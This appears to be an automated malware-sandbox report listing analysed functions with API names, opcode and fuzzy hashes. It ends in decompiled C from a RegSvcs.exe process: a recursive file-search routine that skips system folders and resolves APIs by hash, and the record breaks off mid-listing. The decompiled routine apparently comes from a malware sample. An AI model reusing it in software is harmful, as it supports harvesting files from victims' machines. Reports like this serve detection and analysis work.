                                  • API ID: LongWindow
                                  • String ID:
                                  • API String ID: 1378638983-0
                                  • Opcode ID: ed55d02f9457ab49aa6fdcafb8a479bb2d86ad96658e31812889d0c15fbba151
                                  • Instruction ID: 3e75962413daa55c37832484a98d5bad577308006c5fe39baa7d7c45054aa2c7
                                  • Opcode Fuzzy Hash: ed55d02f9457ab49aa6fdcafb8a479bb2d86ad96658e31812889d0c15fbba151
                                  • Instruction Fuzzy Hash: D21100B58003499FDB10CF99D584BDEFBF8EB89324F20841AE958A7740C378A944CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0279FF38, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetWindowLongW.USER32(?,?,?), ref: 0279FF9D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.289097828.0000000002790000.00000040.00000001.sdmp, Offset: 02790000, based on PE: false
                                  Similarity
                                  • API ID: LongWindow
                                  • String ID:
                                  • API String ID: 1378638983-0
                                  • Opcode ID: 8cf1d891c3d061776e13ddd2959a5b03118abbfa19cca8425c259dcbb3f46e21
                                  • Instruction ID: baf29793c2fb04f1a7d86b49ad8eafa40459f89feb788545ade52386a213549f
                                  • Opcode Fuzzy Hash: 8cf1d891c3d061776e13ddd2959a5b03118abbfa19cca8425c259dcbb3f46e21
                                  • Instruction Fuzzy Hash: ED1100B59107098FDB10CF99E584BDEFBF9EB49324F20841AD958A7740C378A949CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00BD78E0, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: fb438f6883f7b7041d8b785596b355ff7443155210eaf1e324abaf58d0240769
                                  • Instruction ID: 88ead8745037ff54d85bd6f187e554aa9ab73392699c6eb3ad34f1bdaf0d891c
                                  • Opcode Fuzzy Hash: fb438f6883f7b7041d8b785596b355ff7443155210eaf1e324abaf58d0240769
                                  • Instruction Fuzzy Hash: 4F1123B18042498FCB10CF9AD488BDEFBF8EB48324F24845AD558B7340D778A944CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00BD78DB, Relevance: 1.5, APIs: 1, Instructions: 42threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 36340c0938ef7b05f1771d7f2a7fc342df5568159aabc16d9015b2e29296070c
                                  • Instruction ID: 20766165e5e1fcfb24c434718cbb4d2cea873c5c4cf50cd91bd2ebbf4aad96fa
                                  • Opcode Fuzzy Hash: 36340c0938ef7b05f1771d7f2a7fc342df5568159aabc16d9015b2e29296070c
                                  • Instruction Fuzzy Hash: 771130B28042498FCB10CF99C588BDEFBF4AB48324F24845AD558B3740D7B8A944CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00DFD4C4, Relevance: .1, Instructions: 75COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288970284.0000000000DFD000.00000040.00000001.sdmp, Offset: 00DFD000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e7671dc7e89215070c88bae6f4b895fc8d85e8fb8bcc82bee2aea1c7d0bde1f8
                                  • Instruction ID: ca2313117ed0c37d617b10c2465a836cffeb2c6439342fa9fc93f5d093d3edc0
                                  • Opcode Fuzzy Hash: e7671dc7e89215070c88bae6f4b895fc8d85e8fb8bcc82bee2aea1c7d0bde1f8
                                  • Instruction Fuzzy Hash: 2A21F1B2504248EFDB01DF14D8C0B36BB67FB88328F29C569EA450B346C336D846DAB1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00E0D1D4, Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288984501.0000000000E0D000.00000040.00000001.sdmp, Offset: 00E0D000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 271458cfa3f5b321fc6653b143fe1eea1fa6341a0a38098f6b01ab59dd041f8a
                                  • Instruction ID: 1884dade9bbe5d79990368f493ac528c57dc206913c8a9d6d5f61e2583ed59bf
                                  • Opcode Fuzzy Hash: 271458cfa3f5b321fc6653b143fe1eea1fa6341a0a38098f6b01ab59dd041f8a
                                  • Instruction Fuzzy Hash: 6221F571908340EFDB01DF94D9C0B66BBA5FB84318F24C66DE8095B296C736D896CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00E0D01C, Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288984501.0000000000E0D000.00000040.00000001.sdmp, Offset: 00E0D000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 702076159955129757ee166d9cb5f2f3e0711b8b9158a344740e76078c004e7a
                                  • Instruction ID: fd02616ba487595b25ba68649b2bfab89e698c21b77fcaf783035696c5a7b3e4
                                  • Opcode Fuzzy Hash: 702076159955129757ee166d9cb5f2f3e0711b8b9158a344740e76078c004e7a
                                  • Instruction Fuzzy Hash: 5E21D371508240DFDB14DF64D8C0B66BB66EB84318F24C569D84D5B286C736D886CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00E0D005, Relevance: .1, Instructions: 62COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288984501.0000000000E0D000.00000040.00000001.sdmp, Offset: 00E0D000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b4b7b1474294b1cef22be86990f356290b7c569c77cccfdca42294c1ddbb34e2
                                  • Instruction ID: 2aff4499fa958540da68cf7f9d245613df86004206bd4040ec5ab69c0ee28165
                                  • Opcode Fuzzy Hash: b4b7b1474294b1cef22be86990f356290b7c569c77cccfdca42294c1ddbb34e2
                                  • Instruction Fuzzy Hash: C521927550D3C08FCB02CF24D990715BF71EB46314F28C5EAD8498B697C33A984ACB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00DFD4BF, Relevance: .1, Instructions: 56COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288970284.0000000000DFD000.00000040.00000001.sdmp, Offset: 00DFD000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 917a5ae3d983fd734d8602945f9d5328e8532b02038ce25639f7386fa4c58ab9
                                  • Instruction ID: 900ab5d94355da0a8b1b31a8f0ba9890573b752eb4816bcc6e18925be09d8c37
                                  • Opcode Fuzzy Hash: 917a5ae3d983fd734d8602945f9d5328e8532b02038ce25639f7386fa4c58ab9
                                  • Instruction Fuzzy Hash: 7211B176804284DFCB11CF14D5C4B26BF72FB85324F28C6A9D9450B756C336D85ACBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00E0D1CF, Relevance: .1, Instructions: 53COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288984501.0000000000E0D000.00000040.00000001.sdmp, Offset: 00E0D000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: de1ca536cd1c41e12caa75795dfdbee05fb5903b243fce9bc442825e70aaeb29
                                  • Instruction ID: 7d5848b4ddb0f3f718eb1b2f1fc3164ae071cbc7788facb90f166cbe43b17573
                                  • Opcode Fuzzy Hash: de1ca536cd1c41e12caa75795dfdbee05fb5903b243fce9bc442825e70aaeb29
                                  • Instruction Fuzzy Hash: 8711D075908280DFCB01CF54D9C0B15FB71FB84328F24C6ADD8494B6A6C33AD85ACB51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00DFD745, Relevance: .0, Instructions: 45COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288970284.0000000000DFD000.00000040.00000001.sdmp, Offset: 00DFD000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 608a2bf5ca114a578d30f410aefcea95f86e934dc5523a55ec6ad321f763eb22
                                  • Instruction ID: ed9041a81370c71b7c1110a0fceea248955f9d2828907a72cb75075be49fba09
                                  • Opcode Fuzzy Hash: 608a2bf5ca114a578d30f410aefcea95f86e934dc5523a55ec6ad321f763eb22
                                  • Instruction Fuzzy Hash: 67014771008788AAE7106E25DC84B76FB9AEF41338F29C51AEF064F246C7789C44C6B1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00DFD744, Relevance: .0, Instructions: 36COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288970284.0000000000DFD000.00000040.00000001.sdmp, Offset: 00DFD000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f7d425fce0626b91a3ce603145d8f888633517b87e88539c13a13919948d3e04
                                  • Instruction ID: 843ca4ffeab93191f349516febf652685fb729e9b01a772f2ad1a468ff9663a0
                                  • Opcode Fuzzy Hash: f7d425fce0626b91a3ce603145d8f888633517b87e88539c13a13919948d3e04
                                  • Instruction Fuzzy Hash: 24F06271404244AEEB109E15DC84B62FFA9EB81734F18C45AEE095F296C3799C45CAB1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 00BD2A50, Relevance: 1.6, Strings: 1, Instructions: 357COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: D0l
                                  • API String ID: 0-3512419482
                                  • Opcode ID: 6b586b8eb04c51c371b8199b36239e54e37913638b27a886a9af2f860cfc26e5
                                  • Instruction ID: b5ce8bc59f595332dc06b371f361f832f46ef12e812b94593ac9a9084c5bfa39
                                  • Opcode Fuzzy Hash: 6b586b8eb04c51c371b8199b36239e54e37913638b27a886a9af2f860cfc26e5
                                  • Instruction Fuzzy Hash: CCD1A170E0424A8FCF08CFB9C5856AEFBF2EF98314F14856AD515A7354EB749D418B90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00BD01F9, Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: UlA
                                  • API String ID: 0-501016178
                                  • Opcode ID: 2611d2ad0ba2129f31783cba4e92ef24983299c9f52896b5f340b6fda1c07c34
                                  • Instruction ID: dd1812d571857af5b1f7e7e938a0be06c92775af4d4667fac5172ef340712516
                                  • Opcode Fuzzy Hash: 2611d2ad0ba2129f31783cba4e92ef24983299c9f52896b5f340b6fda1c07c34
                                  • Instruction Fuzzy Hash: 5C311375E116188FDB18DF6AD94479EFBF3AFC9300F14C0AAC409A7264EB744A458F15
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0279E570, Relevance: .3, Instructions: 315COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.289097828.0000000002790000.00000040.00000001.sdmp, Offset: 02790000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b9f94a22300f4ef908de201abb18eb9c7778105bdccd3314941f50c02aeee7e5
                                  • Instruction ID: 1681cbd29930daea97bb51af8cc7e1cb49de64ae0a0baa6430bd2e713fff4ec2
                                  • Opcode Fuzzy Hash: b9f94a22300f4ef908de201abb18eb9c7778105bdccd3314941f50c02aeee7e5
                                  • Instruction Fuzzy Hash: 0912C5F1C917468BD312DF65E898B897F61B746328FD0CA09D2613AAD0D7B4116ECF88
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0279C124, Relevance: .3, Instructions: 265COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.289097828.0000000002790000.00000040.00000001.sdmp, Offset: 02790000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2798bc312cb488f08bd5be46e7c87e83542d09af3fd71e612d35e4bca99f9dd9
                                  • Instruction ID: 959553f8b6fff87bd5cafdfaea8fdf80b89afbf38af35bf903f66d72464463da
                                  • Opcode Fuzzy Hash: 2798bc312cb488f08bd5be46e7c87e83542d09af3fd71e612d35e4bca99f9dd9
                                  • Instruction Fuzzy Hash: 0FA17D32E003198FCF16DFA5D84499EB7B3FF89304B15856AE905BB265EB31A915CF40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00BD35C5, Relevance: .2, Instructions: 235COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 36c5cb05a550eda70766118ede54dabf8b66fe59bab228633286e8639721226a
                                  • Instruction ID: 6ea89335d05cc1ce7d536dce57c047fb66c76032c176d967578c4fcf89cd9caa
                                  • Opcode Fuzzy Hash: 36c5cb05a550eda70766118ede54dabf8b66fe59bab228633286e8639721226a
                                  • Instruction Fuzzy Hash: 2FB12874E142598FCB14CFA9C980A9EFBF2FF85704F2481AAD404A7356E7349A42CF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00BD3610, Relevance: .2, Instructions: 226COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a02326eb9feafdba2744e11cc117ae60302a28108314a952ed5f79ce62b0c4b7
                                  • Instruction ID: 70f40259cc1adb34f6383bc9b43374bf3ef1cf88f13796a265ddf517eddf4165
                                  • Opcode Fuzzy Hash: a02326eb9feafdba2744e11cc117ae60302a28108314a952ed5f79ce62b0c4b7
                                  • Instruction Fuzzy Hash: D5A11874E142198BCB14DFA5C980AAEFBF2FF89704F24C1AAD409A7356D7309A41CF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0279E560, Relevance: .2, Instructions: 222COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.289097828.0000000002790000.00000040.00000001.sdmp, Offset: 02790000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bb1470cb62a7746778c6c8005ebbf1a0ac9dfc8b1ab2b57267c8f4299e7afe1b
                                  • Instruction ID: f2f6f7aedaacd25eab24dbc0cfb566d6b6089e8ca91eec84cf41b2ec544659db
                                  • Opcode Fuzzy Hash: bb1470cb62a7746778c6c8005ebbf1a0ac9dfc8b1ab2b57267c8f4299e7afe1b
                                  • Instruction Fuzzy Hash: 42C129B1C917458BD712DF65E888B897F71FB86328F90CA09D1617BAD0D7B4106ACF88
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00BD5590, Relevance: .2, Instructions: 189COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c32b6ff9b15d2d4d72a2150c602fb08a17e63bd4ef5672104a344491ecae23c0
                                  • Instruction ID: da63c7dadaff03fa42891e669bf81401045cb01e120f3a329ee08af6fb1a6b86
                                  • Opcode Fuzzy Hash: c32b6ff9b15d2d4d72a2150c602fb08a17e63bd4ef5672104a344491ecae23c0
                                  • Instruction Fuzzy Hash: 307124B0E1560A9BCB14CFE6E4815AEFBF2FF99301F60956AD405B7314E7348A428F94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00BD5580, Relevance: .2, Instructions: 184COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 796adbbfdf13ceeadd88085d3d4d6ab2fb1fd7b7cd99c000ad9dba544566bf51
                                  • Instruction ID: 6f9809fe69d48cab8cc8f24d17780037104bd04f55b8da415cd3d0574619fbcd
                                  • Opcode Fuzzy Hash: 796adbbfdf13ceeadd88085d3d4d6ab2fb1fd7b7cd99c000ad9dba544566bf51
                                  • Instruction Fuzzy Hash: 387122B4E1560A8BCB14CFE5E4815AEFBF2FF99301F60956AD405B7314E7348A828F94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00BD1C50, Relevance: .2, Instructions: 178COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c7e73ac1cfed543759280b9b92d62e7850997cb2d2344ba55b2cd1a4a4c42f49
                                  • Instruction ID: bf01a315e7c66a959a604cd322ca8fcbb1be0e4213750b5fdfb4f9044a39b2e5
                                  • Opcode Fuzzy Hash: c7e73ac1cfed543759280b9b92d62e7850997cb2d2344ba55b2cd1a4a4c42f49
                                  • Instruction Fuzzy Hash: CD813874A142599BCB14CFA9C9806AEFBF2EF88304F24C5AAD408A7355E7309981CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00BD1C98, Relevance: .2, Instructions: 173COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 65944900a072bad9c3ea8a937e75c3ab979b5780f8aa8d8128f28592e1345b07
                                  • Instruction ID: ffe5476d90f40cb955b4f45716a533f9ef0c523d7d3a1ed6cbcc7253756b926f
                                  • Opcode Fuzzy Hash: 65944900a072bad9c3ea8a937e75c3ab979b5780f8aa8d8128f28592e1345b07
                                  • Instruction Fuzzy Hash: ED713B70E112199BDB14DFA9C980A9EFBF7FF88300F24C4AAD408A7355E73099818F60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00BD2F98, Relevance: .1, Instructions: 138COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 01d221233675d9d9a840f3213c8b2629ef8b3bdbf1d62cc37ee3b15e0da5ecfa
                                  • Instruction ID: 0fd50893ff1ed071d3a9161f517546cce2c5241428ed6b139fd61c802b5e6c85
                                  • Opcode Fuzzy Hash: 01d221233675d9d9a840f3213c8b2629ef8b3bdbf1d62cc37ee3b15e0da5ecfa
                                  • Instruction Fuzzy Hash: 4D51E674E102598BCB54CF69D980AAEFBF6FB88304F24C1AAD408A7315DB309A41DF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00BD2F88, Relevance: .1, Instructions: 132COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 46487ff4aca82a2459c104a55f4d4d6398a96a21539d551016086c6a42e11866
                                  • Instruction ID: 5d0c15869498ca1adbbb897d2ceab2da6ad2159e19d50dc4031435f2613e9830
                                  • Opcode Fuzzy Hash: 46487ff4aca82a2459c104a55f4d4d6398a96a21539d551016086c6a42e11866
                                  • Instruction Fuzzy Hash: 4C511B74E152588FCB54CF69D980A9EFBF2BF89304F24C1AAD408A7356DB309A41DF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00BD0006, Relevance: .1, Instructions: 118COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3ffcf6a04a3b0c53e27caec1f8f7d850a0cda9b181800ed3c59106831c5f6774
                                  • Instruction ID: b686619959f71f050824d1c199e8c21064821bdd016c56e27a2239968f3a2cdd
                                  • Opcode Fuzzy Hash: 3ffcf6a04a3b0c53e27caec1f8f7d850a0cda9b181800ed3c59106831c5f6774
                                  • Instruction Fuzzy Hash: E45147B4D19249DFCB05DFAAC5806AEFFF2AF89300F24C1AAC405E7255E7345A45CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00BD0040, Relevance: .1, Instructions: 102COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 509746a0384f14dee5a1379ade4e127ac7a4739e4879cb2a351486625cea5ca8
                                  • Instruction ID: 1140523285aa34a3dd40799a2ab122530a914f9c1b2737c935935b4a69e00884
                                  • Opcode Fuzzy Hash: 509746a0384f14dee5a1379ade4e127ac7a4739e4879cb2a351486625cea5ca8
                                  • Instruction Fuzzy Hash: ED41E9B4D1560ADBCB48DFA6C5806AEFBF2BF88300F24C56AC405B7354E7345A418F95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00BD1640, Relevance: .1, Instructions: 78COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6a2471b496a156e8058c36949e73c1ee04e4240e6723b6eff88f7e5623265f8c
                                  • Instruction ID: 306b032476e7039f12331c9bac0ae2e125e9e583cbf0f9594a21dcd0827eca76
                                  • Opcode Fuzzy Hash: 6a2471b496a156e8058c36949e73c1ee04e4240e6723b6eff88f7e5623265f8c
                                  • Instruction Fuzzy Hash: 71310C74E152199BDB18CFAAD9406EEFBF6FBC9300F14C4AAD508A7314EB305A458F61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00BD1622, Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 80ccba9b88288c237464805401fddcb7640fa8d4defe5e9ac7c627dd6480da01
                                  • Instruction ID: 45b8a45fab80efceb999c102cdb3c79f74d82bd5d0cbf4d44fea23d84962500c
                                  • Opcode Fuzzy Hash: 80ccba9b88288c237464805401fddcb7640fa8d4defe5e9ac7c627dd6480da01
                                  • Instruction Fuzzy Hash: 60312A70E156099FDB58CFAAD95069EFBF3AFC9300F18C4AAD408A7355EB304A458F61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00BD1620, Relevance: .1, Instructions: 68COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 093a3e62ec9343afb3d6256b618ef4690e40e57f2830656bd917d9021f7fdff9
                                  • Instruction ID: ea6e518d69cc88a67084d178ddb5d855905e1af3c3e9126a75c83cb75309f0dc
                                  • Opcode Fuzzy Hash: 093a3e62ec9343afb3d6256b618ef4690e40e57f2830656bd917d9021f7fdff9
                                  • Instruction Fuzzy Hash: 86214170E116199BDB58CFAAD94069EFAF3EFC8300F18C4AAD408A7354EB304A458F51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Analysis Process: RegSvcs.exe PID: 5412 Parent PID: 1152 RegSvcs.exeCOMMON

                                  Executed Functions

                                  Function 00403D74, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				struct _WIN32_FIND_DATAW _v596;
				void* __ebx;
				void* _t35;
				int _t43;
				void* _t52;
				int _t56;
				intOrPtr _t60;
				void* _t66;
				void* _t73;
				void* _t74;
				WCHAR* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				WCHAR* _t102;
				void* _t103;
				void* _t104;

				L004067C4(0xa); // executed
				_t72 = 0;
				_t100 = 0x2e;
				_t106 = _a16;
				if(_a16 == 0) {
					L15:
					_push(_a8);
					_t98 = E00405B6F(0, L"%s\\%s", _a4);
					_t104 = _t103 + 0xc;
					if(_t98 == 0) {
						L30:
						__eflags = 0;
						return 0;
					}
					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
					_t35 = FindFirstFileW(_t98,  &_v596); // executed
					_t73 = _t35;
					if(_t73 == 0xffffffff) {
						L29:
						E00402BAB(_t98);
						goto L30;
					}
					L17:
					while(1) {
						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
							if(_v596.dwFileAttributes != 0x10) {
								L21:
								_push( &(_v596.cFileName));
								_t101 = E00405B6F(_t124, L"%s\\%s", _a4);
								_t104 = _t104 + 0xc;
								if(_t101 == 0) {
									goto L24;
								}
								if(_a12 == 0) {
									E00402BAB(_t98);
									E00403BEF(_t73);
									return _t101;
								}
								_a12(_t101);
								E00402BAB(_t101);
								goto L24;
							}
							_t124 = _a20;
							if(_a20 == 0) {
								goto L24;
							}
							goto L21;
						} else {
							L24:
							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
							_t43 = FindNextFileW(_t73,  &_v596); // executed
							if(_t43 == 0) {
								E00403BEF(_t73); // executed
								goto L29;
							}
							_t100 = 0x2e;
							continue;
						}
					}
				}
				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
				if(_t102 == 0) {
					L14:
					_t100 = 0x2e;
					goto L15;
				}
				E004031E5(0, 0, 0xd4f4acea, 0, 0);
				_t52 = FindFirstFileW(_t102,  &_v596); // executed
				_t74 = _t52;
				if(_t74 == 0xffffffff) {
					L13:
					E00402BAB(_t102);
					_t72 = 0;
					goto L14;
				} else {
					goto L3;
				}
				do {
					L3:
					if((_v596.dwFileAttributes & 0x00000010) == 0) {
						goto L11;
					}
					if(_a24 == 0) {
						L7:
						if(E00405D24( &(_v596.cFileName)) >= 3) {
							L9:
							_push( &(_v596.cFileName));
							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
							_t103 = _t103 + 0xc;
							_a16 = _t60;
							_t115 = _t60;
							if(_t60 == 0) {
								goto L11;
							}
							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
							E00402BAB(_a16);
							_t103 = _t103 + 0x1c;
							if(_t99 != 0) {
								E00402BAB(_t102);
								E00403BEF(_t74);
								return _t99;
							}
							goto L11;
						}
						_t66 = 0x2e;
						_t114 = _v596.cFileName - _t66;
						if(_v596.cFileName == _t66) {
							goto L11;
						}
						goto L9;
					}
					_push(L"Windows");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					_push(L"Program Files");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					goto L7;
					L11:
					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
					_t56 = FindNextFileW(_t74,  &_v596); // executed
				} while (_t56 != 0);
				E00403BEF(_t74); // executed
				goto L13;
			}




















                                  0x00403d82
                                  0x00403d88
                                  0x00403d8c
                                  0x00403d8d
                                  0x00403d90
                                  0x00403ea9
                                  0x00403ea9
                                  0x00403eb9
                                  0x00403ebb
                                  0x00403ec0
                                  0x00403f95
                                  0x00403f95
                                  0x00000000
                                  0x00403f95
                                  0x00403ece
                                  0x00403edb
                                  0x00403edd
                                  0x00403ee2
                                  0x00403f8e
                                  0x00403f8f
                                  0x00000000
                                  0x00403f94
                                  0x00000000
                                  0x00403ee8
                                  0x00403ef8
                                  0x00403f0a
                                  0x00403f12
                                  0x00403f18
                                  0x00403f26
                                  0x00403f28
                                  0x00403f2d
                                  0x00000000
                                  0x00000000
                                  0x00403f33
                                  0x00403f76
                                  0x00403f7c
                                  0x00000000
                                  0x00403f83
                                  0x00403f36
                                  0x00403f3a
                                  0x00000000
                                  0x00403f40
                                  0x00403f0c
                                  0x00403f10
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00403f41
